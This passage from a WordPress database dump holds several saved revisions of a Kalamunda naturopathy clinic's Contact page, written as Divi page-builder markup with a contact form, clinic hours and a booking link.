normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-09 21:23:44','2025-04-09 13:23:44','',26,'https://verdenaturopathy.com.au/?p=469',0,'revision','',0),(468,1,'2025-04-09 21:22:58','2025-04-09 13:22:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||541px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" use_background_color_gradient=\"on\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" custom_padding=\"||38px|||\" min_height=\"209.5px\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\" title_text=\"Untitled design\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-09 21:22:58','2025-04-09 13:22:58','',26,'https://verdenaturopathy.com.au/?p=468',0,'revision','',0),(456,1,'2025-04-09 20:47:55','2025-04-09 12:47:55','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" hover_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" box_shadow_style=\"preset2\" sticky_enabled=\"0\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-09 20:47:55','2025-04-09 